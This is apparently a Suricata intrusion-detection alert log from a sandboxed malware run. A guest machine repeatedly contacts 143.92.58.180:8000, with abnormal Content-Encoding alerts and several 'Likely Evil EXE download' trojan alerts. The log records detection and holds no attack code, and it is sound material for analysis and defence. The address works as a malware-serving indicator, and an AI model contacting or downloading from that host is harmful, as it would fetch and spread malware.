TCP 192.168.56.103:49637 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49567 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49757 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49537 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49642 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49767 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49573 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49648 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49778 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49577 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49579 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49650 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49785 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49591 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49651 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49791 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49594 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49654 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49799 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49538 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49661 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49606 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49800 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49664 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49805 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49539 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49667 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49329 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49677 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49331 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49634 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49685 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49546 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49690 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49635 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49334 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49694 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49338 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49702 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49552 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49340 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49636 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49708 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49352 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49354 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49711 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49643 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49558 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49360 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49714 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49365 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49722 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49570 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49367 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49649 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49730 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49376 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49737 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49377 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49576 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49653 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49739 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49381 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49744 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49385 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49586 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49659 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49751 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49398 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49411 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49660 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49412 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49588 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49756 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49417 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49759 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49665 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49420 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49590 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49810 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49763 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49811 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49765 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49812 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49668 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49597 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49769 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49770 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49421 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49598 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49771 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49679 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49423 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49774 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49600 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49436 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49706 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49782 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49439 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49786 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49440 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49613 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49790 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49712 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49442 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49794 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49455 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49798 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49460 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49616 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49728 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49806 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49467 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49621 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49473 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49747 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49481 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49748 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49490 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49750 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49491 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49752 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49498 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49807 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49773 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49499 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49818 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49787 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49502 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49819 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49795 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49503 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49803 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49508 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49813 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49510 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49516 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49814 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49542 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49627 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49543 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49639 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49550 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49644 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49559 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49646 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49824 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49575 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49826 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49655 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49578 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49582 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49656 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49584 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49658 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49593 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49669 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49596 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49673 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49611 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49676 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49620 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49700 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49632 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49701 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49647 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49705 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49657 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49707 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49662 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49709 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49663 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49715 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49670 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49723 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49672 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49726 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49674 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49731 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49675 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49746 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49681 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49755 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49691 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49764 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49695 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49766 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49697 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49775 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49698 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49780 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49699 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49784 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49704 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49789 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49716 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49793 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49717 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49802 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49718 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49804 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49719 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49809 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 143.92.58.180:8000 -> 192.168.56.103:49724 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 192.168.56.103:49725 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49816 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49727 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49820 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49729 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49822 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49734 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49825 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
TCP 192.168.56.103:49740 -> 143.92.58.180:8000 2221033 SURICATA HTTP Request abnormal Content-Encoding header Generic Protocol Command Decode
